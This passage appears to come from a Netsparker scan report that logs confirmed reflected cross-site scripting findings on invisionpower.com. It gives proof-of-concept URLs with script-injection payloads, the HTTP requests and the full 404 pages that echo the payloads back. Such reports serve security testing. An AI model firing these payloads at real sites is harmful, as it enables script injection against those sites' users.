@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'"--><script>netsparker(0x000613)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

- /index.php

/index.php CONFIRMED

http://www.invisionpower.com/index.php?'"--><script>alert(0x000631)</script>

Parameters

Parameter	Type	Value
	GET
appcomponent	GET	core
module	GET	customer_area
section	GET	home
Query Based	QUERYSTRING	'"--><script>alert(0x000631)</script>

Request

GET /index.php?'"--><script>netsparker(0x000631)</script> HTTP/1.1
Referer: https://www.invisionpower.com/customer/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:33:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3058
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'"--><script>netsparker(0x000631)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alert(0x000B5B)</script>

Parameters

Parameter	Type	Value
appcomponent	GET	billing
module	GET	order_wizard
section	GET	order
type	GET	packages
hostOpt	GET	1
hostType	GET	community
list	GET	201
Query Based	QUERYSTRING	'"--><script>alert(0x000B5B)</script>

Request

GET /index.php?'"--><script>netsparker(0x000B5B)</script> HTTP/1.1
Referer: http://www.invisionpower.com/hosting/select_package.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:41:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3058
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'"--><script>netsparker(0x000B5B)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alert(0x000BFC)</script>

Parameters

Parameter	Type	Value
appcomponent	GET	core
module	GET	task
Query Based	QUERYSTRING	'"--><script>alert(0x000BFC)</script>

Request

GET /index.php?'"--><script>netsparker(0x000BFC)</script> HTTP/1.1
Referer: https://www.invisionpower.com/index.php?appcomponent=billing&module=order_wizard&section=order&type=packages&list=209
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:41:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3059
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'"--><script>netsparker(0x000BFC)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alert(0x000C4D)</script>

Parameters

Parameter	Type	Value
	GET
